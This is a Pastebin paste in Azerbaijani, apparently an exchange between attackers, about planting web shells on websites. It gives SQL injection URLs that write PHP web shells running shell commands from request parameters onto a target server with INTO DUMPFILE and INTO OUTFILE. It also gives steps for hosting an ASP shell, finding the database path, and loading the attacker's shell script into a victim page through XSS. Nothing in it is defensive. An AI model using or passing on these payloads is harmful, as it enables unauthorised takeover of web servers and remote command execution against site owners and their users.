Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- O Heç Bro SQL İlə upload mümkündür :
- [code]http://www.site.com/index.php?id=-725+UNION+SELECT+null,’CODE’,null,null,null+INTO+DUMPFILE+’/path/on/target/evil.php’—[/code]
- Və ya dediyin kimi İnto Dump Fİle :
- [code] http://www.site.com/index.php?id=-725+UNION+SELECT+null,'<? system($_GET['c']); ?>’,null,null,null+INTO+DUMPFILE+’/path/on/target/evil.php’—[/code]
- Yada OutFile :
- [code]http://www.site.com/index.php?id=-725+UNION+SELECT+"<? system($_REQUEST['cmd']); ?>",2,3,4 INTO+OUTFILE+“/var/www/html/temp/evil.php"[/code]
- Onları Bilirəm. XSS ilədə mümkündü Shell Upload eləmək. Anlatım :
- Deməli SourceForce-dən Shell-i indiririik. pulsuz hosting alırıq .asp dəstəkli. DB-nin yolun bilməliyik. GetDB.asp yaradırıq içinə
- [code]<%
- Response.Write Server.MapPath(".")
- %>
- [/code]
- Upload eləyirik bütün faylları. Sonra GetDB.asp -ni brovser-də açırıq. Database-nin yolun göstərəcək. SOnra shell.asp-mizi acırıq notepad++ ilə. VƏ var = SERVER yerinə serverimizin URL-in yapışdırırıq. sonra admin/db.asp açırıq DBPATH-da yolunu dəyişdirib GetDB.asp-dəki yolu qoyuruq və shell.mdb-yə yönəldirik :
- [code]DBPATH = "D:\usersss\username\db\shell.mdb" [/code]
- Sonrada LFİ kimi include edirik
- [code]<script src=http://səninsiten.tld/shell.asp></script> [/code]
- Beləliklə 1 növ include olur. Gördüyün kimi bu o qədərdə çətin deyil. Yani hər cür shell salmaq olur. Bunun üçün bunu öyrənmək üçün Ansiklopedi boyda anatomi oxudum :D:D:D Deməli Sualım bu deyildi sualım XSS-də tapdığımız MD5 ilə SQL-də çəkdiyimiz MD5 eyni olur ? Sən dedinki olmur sıhv eləmirəmsə mənədə bu lazım idi. Yani Crypt olmur Bununa Bildim Thank`Z
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement